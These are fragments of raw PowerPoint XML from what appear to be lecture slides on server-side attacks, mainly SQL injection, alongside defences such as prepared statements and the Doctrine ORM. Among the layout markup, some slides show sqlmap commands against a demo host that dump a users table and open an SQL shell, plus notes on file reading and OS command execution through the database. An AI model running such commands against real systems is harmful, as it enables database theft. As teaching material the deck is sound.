Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink211.xml"/><Relationship Id="rId397" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink232.xml"/><Relationship Id="rId520" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image226.png"/><Relationship Id="rId562" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink315.xml"/><Relationship Id="rId618" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image274.png"/><Relationship Id="rId825" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink447.xml"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88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169.xml"/><Relationship Id="rId727" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink398.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.png"/><Relationship Id="rId366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image149.png"/><Relationship Id="rId573" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink321.xml"/><Relationship Id="rId780" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image355.png"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink132.xml"/><Relationship Id="rId433" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink250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37.xml"/><Relationship Id="rId377" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink222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437.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.png"/><Relationship Id="rId791" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink430.xml"/><Relationship Id="rId444" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image188.png"/><Relationship Id="rId651" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink360.xml"/><Relationship Id="rId749" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink409.xml"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink164.xml"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink174.xml"/><Relationship Id="rId388" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image160.png"/><Relationship Id="rId511" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink289.xml"/><Relationship Id="rId609" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink339.xml"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink46.xml"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink90.xml"/><Relationship Id="rId595" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink332.xml"/><Relationship Id="rId816" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image373.png"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink143.xml"/><Relationship Id="rId455" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink261.xml"/><Relationship Id="rId662" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2961.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink6.xml"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink69.xml"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink185.xml"/><Relationship Id="rId522" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image424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png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42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image" Target="../media/image4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0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Server-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 err="1"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, XPath Injection, OS Command Injection, File Upload, XXE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8F5C6FF-0D6C-4369-902D-DA109B4F3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9" y="1755401"/>
            <a:ext cx="11034361" cy="28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62DB1A0-2092-4174-B4F5-9E30A67FA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91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4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E3578B4-6FB8-42DC-AA70-C92BBC63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75" y="153601"/>
            <a:ext cx="6996984" cy="26308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50CE82B-C4CC-48D9-8703-07FAA3E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76" y="2900005"/>
            <a:ext cx="7651248" cy="38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15CA995-0593-4154-8ACA-B1292864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1" y="2032890"/>
            <a:ext cx="11021538" cy="24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5CC1772-1E4C-4A8A-9005-45C9A61B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50" y="1511919"/>
            <a:ext cx="10912099" cy="341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43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512220-ABFE-4498-9C30-2C13F267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9" y="839361"/>
            <a:ext cx="11143602" cy="51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481E4CE-BAA5-4D25-A7F6-D8B70917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6" y="1545277"/>
            <a:ext cx="10788008" cy="37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F3B4B8F-1D2F-4D32-B844-277EAB1A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7" y="1668487"/>
            <a:ext cx="10818046" cy="35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71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61E3ABC-7F70-4AAD-A142-341067E0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79" y="1680233"/>
            <a:ext cx="9502042" cy="349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5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560F76-182C-4E06-8C45-6FC2621F4AAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5641178" y="384441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0168B1-494C-46AA-98B4-E99B2C6B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1" y="132428"/>
            <a:ext cx="11961678" cy="3761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3E3F18E-1677-486F-87E9-08EB5A377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4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="115161" y="4213745"/>
            <a:ext cx="11961678" cy="23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Server and Backend </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Attacks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095A26-AC52-43A0-A770-E3E06A5B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44" y="1205834"/>
            <a:ext cx="10620511" cy="44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A17CFF-7DCC-4915-A783-B7DC2799F26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pretty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> easy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>if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application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so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>chatty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6503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21DE67-9694-4BF4-9E8A-F80C4E9D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9" y="317683"/>
            <a:ext cx="6509721" cy="29786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6CCDB4-9C04-428C-9F34-97F0943C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79" y="3515626"/>
            <a:ext cx="6535364" cy="29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6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A4C95E-706F-4FCC-B60E-B30D0AE4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3" y="1795712"/>
            <a:ext cx="11510074" cy="28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0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2B58ABE-E159-42A4-A8A7-7893AB39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91" y="1400575"/>
            <a:ext cx="10956817" cy="40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0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2088BE-0CD2-4B24-9C96-F426BB6B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3" y="1389976"/>
            <a:ext cx="10874794" cy="40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1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F7046D-0126-4F2C-BB72-5C0E0BA1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04" y="1560846"/>
            <a:ext cx="10739992" cy="37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3F742E5-E71B-4789-A9AB-EBC62CB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83" y="1564105"/>
            <a:ext cx="10070433" cy="37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56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084DAE-D571-4CF8-A090-C26F8D88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71" y="1571975"/>
            <a:ext cx="9945057" cy="371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4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2144AF-35BE-447C-8AC6-60CBF2A52549}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2302364" y="6023296"/>
            <a:ext cx="789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first character of the first username equals "m"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5DC133-2C31-4FEA-912C-A13351EF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4" y="2099610"/>
            <a:ext cx="11777732" cy="26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5747172" y="1276655"/>
            <a:ext cx="1873894" cy="672651"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1873894"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 672651"/>
              <a:gd name="connsiteX1" fmla="*/ 605892 w 1873894"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 672651"/>
              <a:gd name="connsiteX2" fmla="*/ 1174307 w 1873894"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 672651"/>
              <a:gd name="connsiteX3" fmla="*/ 1873894 w 1873894"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 672651"/>
              <a:gd name="connsiteX4" fmla="*/ 1873894 w 1873894"/>
              <a:gd name="connsiteY4" fmla="*/ 672651 h 672651"/>
              <a:gd name="connsiteX5" fmla="*/ 1286741 w 1873894"/>
              <a:gd name="connsiteY5" fmla="*/ 672651 h 672651"/>
              <a:gd name="connsiteX6" fmla="*/ 624631 w 1873894"/>
              <a:gd name="connsiteY6" fmla="*/ 672651 h 672651"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 1873894"/>
              <a:gd name="connsiteY7" fmla="*/ 672651 h 672651"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 1873894"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 67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894" h="672651" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="210153" y="-22301"/>
                  <a:pt x="363112" y="9574"/>
                  <a:pt x="605892" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="848672" y="-9574"/>
                  <a:pt x="990008" y="14941"/>
                  <a:pt x="1174307" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1358607" y="-14941"/>
                  <a:pt x="1605810" y="-30352"/>
                  <a:pt x="1873894" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1845599" y="238653"/>
                  <a:pt x="1883285" y="429690"/>
                  <a:pt x="1873894" y="672651"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1650449" y="700257"/>
                  <a:pt x="1410458" y="644975"/>
                  <a:pt x="1286741" y="672651"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1163024" y="700327"/>
                  <a:pt x="853251" y="688210"/>
                  <a:pt x="624631" y="672651"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="396011" y="657093"/>
                  <a:pt x="137364" y="674903"/>
                  <a:pt x="0" y="672651"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8536" y="347015"/>
                  <a:pt x="-31600" y="179868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6048A784-D831-4B4B-9022-AEF16F6913FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7484333" y="1344228"/>
            <a:ext cx="1528913" cy="1567552"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1528913"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1567552"/>
              <a:gd name="connsiteX1" fmla="*/ 494349 w 1528913"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1567552"/>
              <a:gd name="connsiteX2" fmla="*/ 958119 w 1528913"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1567552"/>
              <a:gd name="connsiteX3" fmla="*/ 1528913 w 1528913"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1567552"/>
              <a:gd name="connsiteX4" fmla="*/ 1528913 w 1528913"/>
              <a:gd name="connsiteY4" fmla="*/ 506842 h 1567552"/>
              <a:gd name="connsiteX5" fmla="*/ 1528913 w 1528913"/>
              <a:gd name="connsiteY5" fmla="*/ 998008 h 1567552"/>
              <a:gd name="connsiteX6" fmla="*/ 1528913 w 1528913"/>
              <a:gd name="connsiteY6" fmla="*/ 1567552 h 1567552"/>
              <a:gd name="connsiteX7" fmla="*/ 1019275 w 1528913"/>
              <a:gd name="connsiteY7" fmla="*/ 1567552 h 1567552"/>
              <a:gd name="connsiteX8" fmla="*/ 479059 w 1528913"/>
              <a:gd name="connsiteY8" fmla="*/ 1567552 h 1567552"/>
              <a:gd name="connsiteX9" fmla="*/ 0 w 1528913"/>
              <a:gd name="connsiteY9" fmla="*/ 1567552 h 1567552"/>
              <a:gd name="connsiteX10" fmla="*/ 0 w 1528913"/>
              <a:gd name="connsiteY10" fmla="*/ 1045035 h 1567552"/>
              <a:gd name="connsiteX11" fmla="*/ 0 w 1528913"/>
              <a:gd name="connsiteY11" fmla="*/ 538193 h 1567552"/>
              <a:gd name="connsiteX12" fmla="*/ 0 w 1528913"/>
              <a:gd name="connsiteY12" fmla="*/ 0 h 15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28913" h="1567552" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="151661" y="-564"/>
                  <a:pt x="281388" y="-15761"/>
                  <a:pt x="494349" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="707310" y="15761"/>
                  <a:pt x="858117" y="12664"/>
                  <a:pt x="958119" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1058121" y="-12664"/>
                  <a:pt x="1251707" y="20407"/>
                  <a:pt x="1528913" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1508124" y="246332"/>
                  <a:pt x="1514049" y="322357"/>
                  <a:pt x="1528913" y="506842"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1543777" y="691327"/>
                  <a:pt x="1516040" y="788238"/>
                  <a:pt x="1528913" y="998008"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1541786" y="1207778"/>
                  <a:pt x="1513652" y="1380199"/>
                  <a:pt x="1528913" y="1567552"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1332582" y="1569202"/>
                  <a:pt x="1148716" y="1589114"/>
                  <a:pt x="1019275" y="1567552"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="889834" y="1545990"/>
                  <a:pt x="725218" y="1549781"/>
                  <a:pt x="479059" y="1567552"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="232900" y="1585323"/>
                  <a:pt x="211632" y="1561407"/>
                  <a:pt x="0" y="1567552"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25689" y="1416523"/>
                  <a:pt x="15740" y="1268661"/>
                  <a:pt x="0" y="1045035"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-15740" y="821409"/>
                  <a:pt x="-21984" y="783198"/>
                  <a:pt x="0" y="538193"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21984" y="293188"/>
                  <a:pt x="-5209" y="156899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40" name="Rechteck 739">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{561EC690-BEDA-4738-BD12-E80FA70B4028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9400292" y="2942110"/>
            <a:ext cx="2689712" cy="1639495"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2689712"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1639495"/>
              <a:gd name="connsiteX1" fmla="*/ 645531 w 2689712"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1639495"/>
              <a:gd name="connsiteX2" fmla="*/ 1237268 w 2689712"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1639495"/>
              <a:gd name="connsiteX3" fmla="*/ 1963490 w 2689712"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1639495"/>
              <a:gd name="connsiteX4" fmla="*/ 2689712 w 2689712"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1639495"/>
              <a:gd name="connsiteX5" fmla="*/ 2689712 w 2689712"/>
              <a:gd name="connsiteY5" fmla="*/ 530103 h 1639495"/>
              <a:gd name="connsiteX6" fmla="*/ 2689712 w 2689712"/>
              <a:gd name="connsiteY6" fmla="*/ 1043812 h 1639495"/>
              <a:gd name="connsiteX7" fmla="*/ 2689712 w 2689712"/>
              <a:gd name="connsiteY7" fmla="*/ 1639495 h 1639495"/>
              <a:gd name="connsiteX8" fmla="*/ 2017284 w 2689712"/>
              <a:gd name="connsiteY8" fmla="*/ 1639495 h 1639495"/>
              <a:gd name="connsiteX9" fmla="*/ 1425547 w 2689712"/>
              <a:gd name="connsiteY9" fmla="*/ 1639495 h 1639495"/>
              <a:gd name="connsiteX10" fmla="*/ 753119 w 2689712"/>
              <a:gd name="connsiteY10" fmla="*/ 1639495 h 1639495"/>
              <a:gd name="connsiteX11" fmla="*/ 0 w 2689712"/>
              <a:gd name="connsiteY11" fmla="*/ 1639495 h 1639495"/>
              <a:gd name="connsiteX12" fmla="*/ 0 w 2689712"/>
              <a:gd name="connsiteY12" fmla="*/ 1109392 h 1639495"/>
              <a:gd name="connsiteX13" fmla="*/ 0 w 2689712"/>
              <a:gd name="connsiteY13" fmla="*/ 579288 h 1639495"/>
              <a:gd name="connsiteX14" fmla="*/ 0 w 2689712"/>
              <a:gd name="connsiteY14" fmla="*/ 0 h 163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89712" h="1639495" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="318099" y="-10057"/>
                  <a:pt x="443311" y="23563"/>
                  <a:pt x="645531" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="847751" y="-23563"/>
                  <a:pt x="1081480" y="15055"/>
                  <a:pt x="1237268" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1393056" y="-15055"/>
                  <a:pt x="1795889" y="-18496"/>
                  <a:pt x="1963490" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2131091" y="18496"/>
                  <a:pt x="2479986" y="-21961"/>
                  <a:pt x="2689712" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2696162" y="180679"/>
                  <a:pt x="2687426" y="360568"/>
                  <a:pt x="2689712" y="530103"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2691998" y="699638"/>
                  <a:pt x="2683199" y="902862"/>
                  <a:pt x="2689712" y="1043812"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2696225" y="1184762"/>
                  <a:pt x="2663209" y="1513217"/>
                  <a:pt x="2689712" y="1639495"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2393214" y="1665711"/>
                  <a:pt x="2292966" y="1657445"/>
                  <a:pt x="2017284" y="1639495"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1741602" y="1621545"/>
                  <a:pt x="1550803" y="1654232"/>
                  <a:pt x="1425547" y="1639495"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1300291" y="1624758"/>
                  <a:pt x="1066886" y="1641935"/>
                  <a:pt x="753119" y="1639495"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="439352" y="1637055"/>
                  <a:pt x="181735" y="1651193"/>
                  <a:pt x="0" y="1639495"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-18391" y="1442982"/>
                  <a:pt x="9763" y="1253998"/>
                  <a:pt x="0" y="1109392"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-9763" y="964786"/>
                  <a:pt x="8304" y="835575"/>
                  <a:pt x="0" y="579288"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-8304" y="323001"/>
                  <a:pt x="-518" y="15253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7" grpId="0" animBg="1"/>
      <p:bldP spid="7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D54D02B-EE42-4263-BD8A-4CACDA2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69582"/>
            <a:ext cx="11825831" cy="27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0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85D2D3E-7F5C-45CA-8A83-BBC5C590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4" y="2086401"/>
            <a:ext cx="11825831" cy="26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5A509A2-51A9-4E71-B083-E0383113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2" y="2051472"/>
            <a:ext cx="11901396" cy="27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3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927D1D4-2AE6-461F-BF64-53DEEB3C2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0" y="1937857"/>
            <a:ext cx="12192000" cy="29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4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4CEF31-2FA4-446E-BDE3-16B51000D493}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669409" y="939567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dbs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AF73FD-F97F-4467-B06E-3588EE26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09" y="1495554"/>
            <a:ext cx="3093135" cy="15541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A17791-7925-4C6D-A3FE-D54218C638A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669409" y="3647005"/>
            <a:ext cx="1010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--tables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CE8941-6018-4895-ADC5-30A4C0D4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9" r="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669409" y="4134251"/>
            <a:ext cx="2668864" cy="16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CE2ABA2-597C-4BDC-8443-5576268C040E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1075266" y="599703"/>
            <a:ext cx="1057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http://lightside.me/shop/blind.php?id=1 -D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>lightside</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> -T users --dump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A59CAE-7C7E-46CF-8FD4-D77440B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40" y="1092729"/>
            <a:ext cx="7497481" cy="226007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3814680-6276-43DB-8D4C-325424000F2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1075266" y="3817035"/>
            <a:ext cx="10066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&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> -u http://lightside.me/shop/blind.php?id=1 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>-shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>lightside.users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...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39DE5-0330-4865-AB42-07D3DDC89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"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1154640" y="5105213"/>
            <a:ext cx="6493915" cy="10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826935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5642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61784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6010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943521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997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5DE994-02AE-4B91-99E3-CFBBC34B3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926732" y="1964371"/>
            <a:ext cx="10338536" cy="1710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9D0020-DB1C-4A14-B642-5E3918DF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611" y="4038596"/>
            <a:ext cx="6900778" cy="24147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E6E57A5B-5B0D-4511-A2EA-5E37AD77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Prepared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> Statements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83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A1BF9A5-2910-40A4-8A09-83F0318D4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1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2900362" y="441434"/>
            <a:ext cx="6391275" cy="203358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CA0F0E-F318-4650-9966-7732CB58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DFB444-7E27-4F0D-80C3-BFC84D3A0D99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1574616" y="5149575"/>
            <a:ext cx="96103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96062D2-C6F2-4A88-BA88-353CE055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160" y="5967452"/>
            <a:ext cx="2181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0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08C272E-B879-4659-A02F-A5997F6834D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1319048" y="6492875"/>
            <a:ext cx="10815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/>
              <a:t>https://www.doctrine-project.org/projects/doctrine-orm/en/current/tutorials/getting-started.html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08DF019-DECD-4F75-AD35-C4C8D49C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5"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>ORM </a:t>
            </a:r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Doctrine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>)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1BD4E5-5920-4A9F-B73D-B72389BDA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1" y="1410937"/>
            <a:ext cx="3710152" cy="5019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46219C5-A3AF-4ADB-81E7-144A7066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41" y="1410938"/>
            <a:ext cx="4763567" cy="420145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C4C69B-9366-4362-BE8C-D07FEC59C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41" y="5864638"/>
            <a:ext cx="4763567" cy="3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94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94908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40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1197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B811F-576E-478C-A2F2-53B1ABB3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exploitation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3F531-D9BC-4541-B927-79A44E1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else you can do heavily depends on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query you’re injecting into</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT, INSERT INTO, UPDATE, DELETE, EXEC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operating system and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dbms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>reading / writing files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g. MySQL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>load_file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>executing OS commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g. MS SQL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xp_servicecontrol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AB46A-0C10-497F-9D7C-D352809E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but gold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D1F855-9BA5-401E-9FA9-4F35DB8FE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90" y="2009510"/>
            <a:ext cx="9223220" cy="28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E7D3DA8-CCE2-45CB-9C48-C1FB2C440583}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4622800" y="5606534"/>
            <a:ext cx="294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>
                <a:effectLst/>
              </a:rPr>
